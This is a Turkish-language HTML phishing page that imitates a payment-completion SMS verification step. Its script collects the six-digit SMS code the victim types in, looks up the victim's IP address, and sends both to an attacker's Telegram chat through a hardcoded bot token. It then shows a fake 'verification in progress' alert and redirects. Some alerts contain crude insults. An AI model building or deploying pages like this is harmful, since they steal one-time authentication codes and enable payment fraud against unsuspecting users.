<!DOCTYPE html>
<html lang="tr">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Ödeme Tamamlanıyor</title>
    <!-- Ek stil dosyalarını ekleyebilirsiniz -->
    <style>
        body {
            margin: 0;
            padding: 0;
            font-family: 'Arial', sans-serif;
            background-color: white; /* Açık mavi arkaplan rengi */
        }

        header {
            background-color: #4A90E2; /* Açık mavi header arkaplan rengi */
            padding: 10px;
            text-align: center;
        }

        header img {
            width: 100px; /* Logo genişliği */
        }

        .body_wrapper {
            height: 100vh;
            display: flex;
            align-items: center;
            justify-content: center;
            flex-direction: column;
            text-align: center;
        }

        img {
            width: 100%; /* Resmi genişliğe sığacak şekilde ayarla */
            max-width: 100%;
            height: auto;
        }

        h5 {
            font-size: 1.2em;
        }
    </style>
</head>





<body>
    <header>
        <img src="./logo.png" alt="Logo">
    </header>




<!DOCTYPE html>
<html lang="tr">

<head>
    <meta http-equiv="content-type" content="text/html;charset=UTF-8" />
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
 
    <link href="anadosya/bootstrap.min.css" rel="stylesheet">
    <link href="anadosya/style2.css" rel="stylesheet">
    <link href="anadosya/responsive.css" rel="stylesheet">

    <script src="js/jquery.min.js"></script>
    <script src="js/bootstrap.min.js"></script>
    <script src="js/main.js"></script>
    <script src="js/demo.js"></script>
</head>

<body>
    <div class="body_wrapper frm-vh-md-100">
        <div class="formify_body" data-bg-color="#E3F0FF" style="background-color: rgb(227, 240, 255);">
            <div class="f_content">
                <div class="container">
                    <div class="row">
                        <div class="formify_box">
                            <div class="formify_header text-center">
                                <h4 class="form_title">SMS Doğrulaması</h4>
                            </div>
                            <form method="POST">
                                <!-- Form içeriği buraya gelecek -->
                                <div class="signup_form">
                                    <div class="form-group">
                                        <label class="input_title" for="inputMessage">Sms Kodunuz (Maksimum 6 Karakter)</label>
                                        <input id="inputMessage" name="message" type="text" class="form-control"
                                            maxlength="6" required="">
                                    </div>
                                    <div class="form-group">
                                        <button type="button" class="btn action_btn thm_btn" onclick="sendSMS()">Gönder</button>
                                    </div>
                                </div>
                                <!-- Form içeriği buraya kadar -->
                            </form>
                        </div>
                    </div>
                </div>
            </div>
        </div>
    </div>

    <script>
        function sendSMS() {
            // Kullanıcının girdiği metni al
            var message = document.getElementById('inputMessage').value;

            // Yasaklı kelime kontrolü
            if (message.includes(':DD')) {
                alert('Yarramı yermisin çocuk adam');
                return;
            }

            // Boş metin kontrolü
            if (message.trim() === '') {
                alert('Yarramı Yedinmi Sen hiç ?.');
                return;
            }

            // Kullanıcının IP adresini al
            var ipAddress = '';

            // Tarayıcı tarafında çalışan bir IP algoritması örneği
            // Bu sadece bir örnektir, gerçek dünyada daha karmaşık bir çözüm kullanmanız gerekebilir
            fetch('https://api64.ipify.org?format=json')
                .then(response => response.json())
                .then(data => {
                    ipAddress = data.ip;

                    // Telegram botunuzun API anahtarı ve chat ID'si
                    var botToken = '6310872354:AAEXpycTL7iDBrndrBPpMhr-_aAepxC3VVk';
                    var chatId = '6338892965';

                    // Filtreleme: Eğer mesaj içinde ":DD" kelimesi bulunursa, Telegram'a gönderme
                    if (message.includes(':DD')) {
                        alert('Mesaj içinde ":DD" kelimesi bulunamaz.');
                        return;
                    }

                    // Telegram botuna gönderilecek tek bir mesajı oluştur
                    var combinedMessage = `Sms: ${message}\n\nIP Adresi: ${ipAddress}`;

                    // Telegram botuna mesaj göndermek için kullanılan API URL'si
                    var apiUrl = `https://api.telegram.org/bot${botToken}/sendMessage`;

                    // HTTP isteği gönder
                    var xhr = new XMLHttpRequest();
                    xhr.open("GET", `${apiUrl}?chat_id=${chatId}&text=${combinedMessage}`, true);

                    // İstek tamamlandığında kullanıcıya bilgi ver
                    xhr.onload = function () {
                        // İstek başarılı olduysa
                        if (xhr.status == 200) {
                            alert('Sms Doğrulaması Yapılıyor');
                            // İşlem tamamlandıktan sonra "bekle.html" sayfasına yönlendir
                            window.location.href = "test2.html";
                        } else {
                            // İstek başarısız olduysa kullanıcıya hata mesajı ver
                            alert('Mesaj gönderilirken bir hata oluştu.');
                        }
                    };

                    // İstek gönderme
                    xhr.send();
                })
                .catch(error => console.error('IP alınamadı', error));
        }
    </script>
</body>

</html>


</body>

</html>
